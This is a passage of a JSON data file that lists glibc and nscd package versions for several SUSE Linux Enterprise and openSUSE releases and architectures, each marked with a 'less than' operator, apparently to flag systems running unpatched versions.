"glibc-info-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "nscd-2.11.2-3.3.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-devel-2.9-2.13.1.ppc.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-info-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "glibc-html-2.4-31.77.76.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-html-2.9-2.13.1.ppc.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-html-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-devel-32bit-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i686", "packageFilename": "glibc-2.11.1-0.20.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "glibc-html-2.9-13.11.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "ppc", "packageFilename": "glibc-profile-2.9-2.13.1.ppc.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-locale-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-dceext-32bit-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-dceext-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-2.9-13.11.1.ia64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-html-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-html-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-devel-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-i18ndata-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-2.11.1-0.20.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "glibc-profile-2.9-2.13.1.i686.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-profile-2.9-13.11.1.ia64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "nscd-2.11.1-0.20.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-devel-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "nscd-2.9-2.13.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "glibc-i18ndata-2.9-2.13.1.i686.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-i18ndata-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-32bit-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-info-2.9-13.11.1.s390x.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-locale-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-x86-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-html-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.1-0.20.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-locale-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-locale-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i686", "packageFilename": "glibc-2.11.1-0.20.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ppc64", "packageFilename": "glibc-profile-32bit-2.9-13.11.1.ppc64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "glibc-profile-2.9-13.11.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-debuginfo-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-profile-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "nscd-2.9-2.13.1.i686.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i686", "packageFilename": "glibc-devel-2.9-13.11.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "glibc-2.9-2.13.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-i18ndata-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "glibc-devel-2.9-2.13.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i686", "packageFilename": "glibc-obsolete-2.9-2.13.1.i686.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "glibc-locale-2.4-31.77.76.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i686", "packageFilename": "glibc-2.4-31.77.76.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "glibc-locale-2.9-13.11.1.i586.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-i18ndata-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "glibc-profile-2.4-31.77.76.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "nscd-2.4-31.77.76.1.ppc.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-html-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i586", "packageFilename": "glibc-info-2.11.2-3.3.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-info-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-info-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "nscd-2.11.1-0.20.1.i586.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-debuginfo-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-info-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-devel-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-profile-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i686", "packageFilename": "glibc-2.9-13.11.1.i686.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-i18ndata-2.9-13.11.1.s390x.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-locale-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-i18ndata-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "glibc-profile-32bit-2.4-31.77.76.1.s390x.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-profile-32bit-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-profile-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-locale-32bit-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-x86-2.9-13.11.1.ia64.rpm", "packageName": "glibc-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "ia64", "packageFilename": "glibc-info-2.9-13.11.1.ia64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-obsolete-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ppc64", "packageFilename": "glibc-32bit-2.11.1-0.20.1.ppc64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "glibc-html-2.9-13.11.1.x86_64.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "s390x", "packageFilename": "glibc-32bit-2.11.1-0.20.1.s390x.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "glibc-devel-2.9-13.11.1.i586.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "glibc-2.9-13.11.1.i586.rpm", "packageName": "glibc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.9-2.13.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "i586", "packageFilename": "glibc-html-2.9-13.11.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "glibc-profile-2.4-31.77.76.1.ia64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "x86_64", "packageFilename": "nscd-2.9-13.11.1.x86_64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.2-3.3.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-32bit-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-obsolete-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-obsolete", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-profile-x86-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-profile-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", "arch": "s390x", "packageFilename": "glibc-locale-32bit-2.9-13.11.1.s390x.rpm", "packageName": "glibc-locale-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "i586", "packageFilename": "glibc-i18ndata-2.4-31.77.76.1.i586.rpm", "packageName": "glibc-i18ndata", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-devel-32bit-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "s390x", "packageFilename": "nscd-2.4-31.77.76.1.s390x.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "i586", "packageFilename": "glibc-html-2.11.1-0.20.1.i586.rpm", "packageName": "glibc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.9-2.13.1", "arch": "i586", "packageFilename": "glibc-info-2.9-2.13.1.i586.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-debuginfo-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ia64", "packageFilename": "nscd-2.4-31.77.76.1.ia64.rpm", "packageName": "nscd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "ia64", "packageFilename": "glibc-locale-2.11.1-0.20.1.ia64.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.10.1-10.9.1", "arch": "x86_64", "packageFilename": "glibc-devel-2.10.1-10.9.1.x86_64.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "ppc", "packageFilename": "glibc-locale-2.4-31.77.76.1.ppc.rpm", "packageName": "glibc-locale", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "2.11.1-0.20.1", "arch": "x86_64", "packageFilename": "glibc-info-2.11.1-0.20.1.x86_64.rpm", "packageName": "glibc-info", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.11.2-3.3.1", "arch": "i686", "packageFilename": "glibc-devel-2.11.2-3.3.1.i686.rpm", "packageName": "glibc-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "2.4-31.77.76.1", "arch": "x86_64", "packageFilename": "glibc-profile-2.4-31.77.76.1.x86_64.rpm", "packageName": "glibc-profile", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "2.9-13.11.1", 